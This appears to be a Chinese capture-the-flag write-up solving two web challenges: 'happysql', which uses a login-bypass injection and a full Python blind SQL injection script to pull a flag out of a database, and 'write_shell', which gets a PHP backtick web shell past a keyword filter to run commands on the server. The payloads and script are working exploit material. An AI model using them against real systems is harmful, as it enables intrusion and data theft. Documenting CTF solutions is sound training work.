img

happysql

进入题目,一个登录框:

image-20210402175109614

使用万能密码测试,在登陆的位置存在sql注入。

输入:

1
2
username: whoami"||0#
password: 123456

报错:

image-20210402175135480

输入:

1
2
username: whoami"||1#
password: 123456

登录成功:

image-20210402175210262

我们可以根据这里进行POST型的sql盲注。

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
import requests
import time
import string
import binascii

result = ''

url = "http://eci-2ze6t3je33wd120vx3kg.cloudeci1.ichunqiu.com/login.php"
payload = 'username=admin1"/**/||case/**/when/**/(lpad(((select/**/group_concat(a.2)/**/from/**/(select/**/2/**/union/**/select/**/*/**/from/**/f1ag)/**/as/**/a)),{},1))/**/regexp/**/{}/**/then/**/1/**/else/**/0/**/end%23&password=1'
headers = {
'Content-Type': 'application/x-www-form-urlencoded'
}

for k in range(1, 50):
print(k)
for i in string.printable:
if i in '*+.?|$':
continue
data = payload.format(str(k), '0x' + binascii.b2a_hex((result + i).encode()).decode())
web = requests.post(url, data, headers=headers)
# print(data)
if 'home' in web.text:
result += i
print(result)
break

image-20210402175540005

write_shell

进入题目:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
<?php
error_reporting(0);
highlight_file(__FILE__);
function check($input){
if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){
// if(preg_match("/'| |_|=|php/",$input)){
die('hacker!!!');
}else{
return $input;
}
}

function waf($input){
if(is_array($input)){
foreach($input as $key=>$output){
$input[$key] = waf($output);
}
}else{
$input = check($input);
}
}

$dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/';
if(!file_exists($dir)){
mkdir($dir);
}
switch($_GET["action"] ?? "") {
case 'pwd':
echo $dir;
break;
case 'upload':
$data = $_GET["data"] ?? "";
waf($data);
file_put_contents("$dir" . "index.php", $data);
}
?>

直接使用PHP短标签加反引号执行命令即可。

1
http://eci-2ze69czhh82f38zcdovv.cloudeci1.ichunqiu.com/?action=upload&data=<?=`ls%09/`?>

image-20210402174932031

1
http://eci-2ze69czhh82f38zcdovv.cloudeci1.ichunqiu.com/?action=upload&data=<?=`cat%09/!whatyouwantggggggg401.ph""p`?>

image-20210402174959826